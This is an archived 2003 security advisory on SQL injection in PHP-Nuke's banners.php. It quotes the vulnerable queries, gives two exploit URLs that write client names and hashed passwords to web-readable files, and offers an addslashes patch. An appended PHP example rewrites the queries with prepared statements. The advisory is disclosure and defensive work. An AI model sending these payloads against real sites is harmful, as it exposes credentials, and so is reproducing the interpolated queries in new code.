Vulnwatch mailing list archives
PHP-Nuke : banners.php
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 22 Mar 2003 14:35:19 +0100
Informations :
°°°°°°°°°°°°°°
language : PHP
Website : http://www.phpnuke.org
Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5
Problem : SQL Injection
Config : This will work if magic_quotes_gpc=OFF

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
banners.php :
------------------------------------------------------------------------
[...]
function bannerstats($login, $pass) {
    global $prefix, $db, $sitename;
    $sql = "SELECT cid, name, passwd FROM ".$prefix."_bannerclient WHERE login='$login'";
    $result = $db->sql_query($sql);
    $row = $db->sql_fetchrow($result);
[...]
function change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext) {
    global $prefix, $db;
    $sql = "SELECT passwd FROM ".$prefix."_bannerclient WHERE cid='$cid'";
    $result = $db->sql_query($sql);
    $row = $db->sql_fetchrow($result);
    $passwd = $row[passwd];
    if (!empty($pass) AND $pass==$passwd) {
        $alttext = ereg_replace("\"", "", $alttext);
        $alttext = ereg_replace("'", "", $alttext);
        $db->sql_query("UPDATE ".$prefix."_banner SET clickurl='$url', alttext='$alttext' WHERE bid='$bid'");
        echo "<br><center>";
        if ($url != "") {
            echo "You changed the URL<br>";
        }
        if ($alttext != "") {
            echo "You changed the Alternate Text";
        }
        echo "<br><br><a href=\"javascript:history.go(-1)\">Back to Stats Page</a></center>";
    } else {
        echo "<center><br>Your login/password doesn't match.<br><br>Please <a href=\"banners.php?op=login\">login again</a></center>";
    }
}

switch($op) {
[...]
    case "Ok":
        bannerstats($login, $pass);
        break;
    case "Change":
        change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext);
        break;
}
[...]
?>
------------------------------------------------------------------------

Exploit :
°°°°°°°°°
This will save id, name and crypted password into http://[target]/banners1.txt :
http://[target]/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt

This will save crypted password into http://[target]/banners2.txt :
http://[target]/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
Into banners.php, put before the switch :
--------------------------
$cid=addslashes($cid);
$login=addslashes($login);
--------------------------

More details :
°°°°°°°°°°°°°°
in French : http://www.frogsecure.com/tutos/PHP-Nuke-banners.php.txt

frog-m@n
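The two queries from the advisory above, rewritten with PDO prepared statements so that $login, $cid and $bid are bound as values rather than spliced into the SQL text. This is an added example, not code from the original post or from PHP-Nuke; the *_safe function names, the nuke_* tables and the in-memory SQLite database are constructed for the demo, and it assumes PHP 7.1 or later with the pdo_sqlite extension.

```php
<?php
// Added example (not PHP-Nuke's code): the two banners.php queries rewritten
// with PDO prepared statements, so $login, $cid and $bid reach the database
// as bound values and never become part of the SQL text. Function names
// ending in _safe and the nuke_* tables below are hypothetical.

function bannerstats_safe(PDO $pdo, string $prefix, string $login): ?array
{
    // Table names cannot be bound; $prefix must come from the site config,
    // never from the request.
    $stmt = $pdo->prepare(
        "SELECT cid, name, passwd FROM {$prefix}_bannerclient WHERE login = :login"
    );
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function change_banner_url_by_client_safe(
    PDO $pdo, string $prefix, string $pass, string $cid,
    string $bid, string $url, string $alttext
): bool {
    $stmt = $pdo->prepare("SELECT passwd FROM {$prefix}_bannerclient WHERE cid = :cid");
    $stmt->execute([':cid' => $cid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Same check as the original (non-empty $pass equal to the stored value),
    // done in constant time. A hashed-password scheme is outside this example.
    if ($row === false || $pass === '' || !hash_equals((string) $row['passwd'], $pass)) {
        return false;
    }

    // No ereg_replace stripping needed: quotes in $alttext are just data now.
    $upd = $pdo->prepare(
        "UPDATE {$prefix}_banner SET clickurl = :url, alttext = :alt WHERE bid = :bid"
    );
    return $upd->execute([':url' => $url, ':alt' => $alttext, ':bid' => $bid]);
}

// Constructed demo on an in-memory SQLite database (requires the pdo_sqlite
// extension) so the functions can be exercised offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE nuke_bannerclient (cid INTEGER, name TEXT, login TEXT, passwd TEXT)");
$pdo->exec("CREATE TABLE nuke_banner (bid INTEGER, clickurl TEXT, alttext TEXT)");
$pdo->exec("INSERT INTO nuke_bannerclient VALUES (1, 'Acme', 'acme', 'secret')");
$pdo->exec("INSERT INTO nuke_banner VALUES (1, 'http://example.com', 'Acme banner')");

// Legitimate lookup returns the client's row.
var_dump(bannerstats_safe($pdo, 'nuke', 'acme'));
// The "' OR 1=1" string from the advisory is now compared as a literal login
// value, so no row matches and NULL comes back.
var_dump(bannerstats_safe($pdo, 'nuke', "' OR 1=1"));
// Wrong password: the update is refused.
var_dump(change_banner_url_by_client_safe($pdo, 'nuke', 'wrong', '1', '1', 'http://example.org', 'x'));
// Right password: the update runs, with quotes in alttext stored verbatim.
var_dump(change_banner_url_by_client_safe($pdo, 'nuke', 'secret', '1', '1', 'http://example.org', "Bob's banner"));
var_dump($pdo->query("SELECT clickurl, alttext FROM nuke_banner WHERE bid = 1")->fetch(PDO::FETCH_ASSOC));
```

The addslashes() patch in the advisory escapes quotes in $cid and $login before they are interpolated, which closes the reported injection; binding parameters removes the interpolation altogether, so the fix no longer depends on magic_quotes_gpc or on remembering to escape every variable that reaches a query.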